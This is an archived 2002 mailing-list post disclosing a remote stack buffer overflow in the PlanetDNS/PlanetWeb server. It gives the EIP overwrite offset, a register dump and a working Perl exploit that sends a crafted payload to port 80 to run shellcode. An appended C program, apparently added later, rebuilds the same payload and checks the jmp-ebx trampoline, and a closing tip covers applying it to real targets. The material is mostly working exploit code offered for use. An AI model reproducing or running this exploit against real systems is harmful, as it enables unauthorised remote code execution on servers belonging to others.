New buffer overflow in PlanetDNS

From: securma massine (securmaat_private)
Date: Fri Oct 18 2002 - 10:03:39 PDT

    hi
    PlanetDNS (http://www.planetdns.net) is a commercial software
    package that lets you turn a computer into an Internet server:
    you can create an Internet name and connect to a web server,
    FTP server, mail server, etc. running on that computer.
    PlanetDNS is vulnerable to a buffer overflow with an overwrite
    of EIP (never posted before)... someone already reported that
    1024 bytes could crash the server, and I found that sending
    6500 bytes (without "GET /") makes it possible to overwrite EIP
    and execute shellcode; the overwrite happens at bytes 6449, 50,
    51, 52.
    One also notices that EBX is always 4 bytes before EIP, so the
    return address will be a jmp ebx or call ebx, which can be found
    in many loaded modules.
    I wrote an exploit, tested against PlanetWeb v1.14, which gives
    the following register state:
    Access violation - code c0000005 (first chance)
    eax=0217dfb0 ebx=0217ffdc ecx=43434343 edx=7846f5b5 esi=0217dfd8 edi=00000000
    eip=43434343 esp=0217df18 ebp=0217df38 iopl=0         nv up ei pl zr na po nc
    cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00000246
    43434343 ??              ???
    exploit code:
    #!/usr/bin/perl -w
    # tool bop.pl
    # buffer overflow tested against PlanetWeb v1.14
    # humm.. this exploit is not for lamers...
    # Greetz: marocit and #crack.fr (especially christal... the less
    # hard you pedal, the less you go faster..)
    #
    use strict;
    use IO::Socket;

    if ($#ARGV < 0) {
        print "\n write the target IP!! \n\n";
        exit;
    }

    # add your favourite shellcode (placeholder; keep it position-independent)
    my $shellcode = "YOURFAVORITSHELLCODEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA";

    # 6444 bytes of filler: the next 4 bytes land in the saved EBX slot and
    # the 4 after that (bytes 6449..6452) overwrite the saved EIP.
    my $buffer  = "A" x 6444;

    # EBX is 4 bytes before EIP, so a "jmp ebx"/"call ebx" return address
    # executes this cell: NOP, JMP SHORT +8, NOP.  The +8 (relative to the
    # end of the EB 08 instruction) jumps over $ret and onto the last NOP
    # of $minibuf, right before the shellcode.
    my $ebx     = "\x90\xEB\x08\x90";

    # insert your ret address here (a jmp ebx or call ebx in a loaded module),
    # little-endian; 0x43434343 is the placeholder that produced the crash above
    my $ret     = "\x43\x43\x43\x43";

    # NOP filler skipped by the EB 08
    my $minibuf = "\x90\x90\x90\x90";

    my $connect = IO::Socket::INET->new(
        Proto    => "tcp",
        PeerAddr => $ARGV[0],
        PeerPort => 80,
    ) or die "cant connect $ARGV[0]: $!";

    print "\nsending exploit......\n\n";
    print $connect "$buffer$ebx$ret$minibuf$shellcode";
    close $connect;
    
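Added example, not code from the original post or from PlanetDNS: a C program that lays out the same payload as the Perl exploit above (6444 filler bytes, the 4-byte cell in the saved-EBX slot, the return address at bytes 6449..6452, four NOPs, then the shellcode) and checks the one detail the jmp ebx trampoline rests on: the "jmp short +8" in that cell must skip the return address and come down on the NOP filler just before the shellcode. The return address 0x43434343, the int3 placeholder shellcode, and the handle_request_* functions are assumptions for illustration; PlanetDNS's source is not public, so the unbounded copy shown is the class of bug the post describes, not the product's own code.

```c
/*
 * Added example (not from the post or from PlanetDNS).  Builds the payload
 * exactly as the Perl exploit does and verifies the trampoline assumption:
 * the 4-byte cell below the saved EIP holds "NOP; JMP SHORT +8; NOP", and
 * that jump must skip the return address and land on the NOP filler before
 * the shellcode.  Offsets are the post's; ret, "shellcode" and the
 * handle_request_* functions are illustrative assumptions.
 */
#include <stdint.h>
#include <stdio.h>
#include <string.h>

#define PAD_LEN        6444            /* "A" x 6444 in the exploit */
#define EBX_CELL_OFF   PAD_LEN         /* cell the exploit assumes EBX points at */
#define RET_OFF        (PAD_LEN + 4)   /* saved EIP: bytes 6449..6452 (1-based) */
#define MINIBUF_OFF    (PAD_LEN + 8)   /* four NOPs */
#define SHELLCODE_OFF  (PAD_LEN + 12)
#define MAX_PAYLOAD    8192

static const uint8_t ebx_cell[4]       = { 0x90, 0xEB, 0x08, 0x90 };
static const uint8_t demo_shellcode[4] = { 0xCC, 0xCC, 0xCC, 0xCC }; /* int3 x4, placeholder */

static uint8_t g_payload[MAX_PAYLOAD];

/* Decode "EB rel8" at buf[off]; return the offset (from buf) where execution
 * continues, or -1 if there is no jmp short there. */
long jmp_short_target(const uint8_t *buf, size_t len, size_t off)
{
    if (off + 2 > len || buf[off] != 0xEB)
        return -1;
    int8_t rel = (int8_t)buf[off + 1];
    return (long)(off + 2) + rel;      /* rel8 is relative to the next instruction */
}

/* Assemble filler | ebx cell | ret | minibuf | shellcode.  ret is written
 * little-endian, like the Perl "\x43\x43\x43\x43".  Returns the payload
 * length, or 0 if it would not fit in out. */
size_t build_payload(uint8_t *out, size_t outsz, uint32_t ret,
                     const uint8_t *shellcode, size_t sc_len)
{
    size_t total = SHELLCODE_OFF + sc_len;
    if (total > outsz)
        return 0;
    memset(out, 'A', PAD_LEN);
    memcpy(out + EBX_CELL_OFF, ebx_cell, sizeof ebx_cell);
    for (int i = 0; i < 4; i++)
        out[RET_OFF + i] = (uint8_t)(ret >> (8 * i));
    memset(out + MINIBUF_OFF, 0x90, 4);
    memcpy(out + SHELLCODE_OFF, shellcode, sc_len);
    return total;
}

/* The jump in the EBX cell (EB is the cell's second byte) must land inside the
 * NOP filler or exactly on the first shellcode byte; anywhere else and either
 * the return address is executed as code or shellcode bytes are skipped. */
int payload_layout_ok(const uint8_t *buf, size_t len)
{
    long t = jmp_short_target(buf, len, EBX_CELL_OFF + 1);
    return t >= (long)MINIBUF_OFF && t <= (long)SHELLCODE_OFF;
}

/* Fill g_payload with the placeholder ret (0x43434343, the value in the post's
 * crash dump) and the int3 placeholder; returns the payload length. */
size_t build_example(void)
{
    return build_payload(g_payload, sizeof g_payload, 0x43434343u,
                         demo_shellcode, sizeof demo_shellcode);
}

/* The bug class the post describes (hypothetical; PlanetDNS source is not
 * public): a request copied into a fixed stack buffer with no length check.
 * Never called here.  With len > sizeof line the copy runs over the saved
 * EBX and then the saved EIP, which is what the 6449..6452 figure reflects. */
void handle_request_vuln(const uint8_t *req, size_t len)
{
    char line[1024];
    memcpy(line, req, len);
    (void)line;
}

/* Bounded version: reject anything that does not fit, so nothing above
 * 'line' is reachable from the network.  Returns 0 if accepted, -1 if not. */
int handle_request_fixed(const uint8_t *req, size_t len)
{
    char line[1024];
    if (len >= sizeof line)
        return -1;
    memcpy(line, req, len);
    line[len] = '\0';
    return 0;
}

int main(void)
{
    size_t n = build_example();
    long t = jmp_short_target(g_payload, n, EBX_CELL_OFF + 1);
    printf("payload %zu bytes, saved EIP at %d..%d, jmp short lands at %ld, "
           "shellcode at %d -> %s\n", n, RET_OFF, RET_OFF + 3, t, SHELLCODE_OFF,
           payload_layout_ok(g_payload, n) ? "ok" : "BAD LAYOUT");
    return payload_layout_ok(g_payload, n) ? 0 : 1;
}
```

Build with cc -Wall and run; a non-zero exit means the short jump would not reach the filler. One check before relying on the jmp ebx route on a real target: the dump in the post shows ebx=0217ffdc with esp=0217df18 at the crash, so confirm in the debugger that EBX actually points at the four bytes immediately below the overwritten saved EIP when that EIP is taken, rather than assuming the 4-byte distance holds for your build.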



    This archive was generated by hypermail 2b30 : Fri Oct 18 2002 - 10:03:41 PDT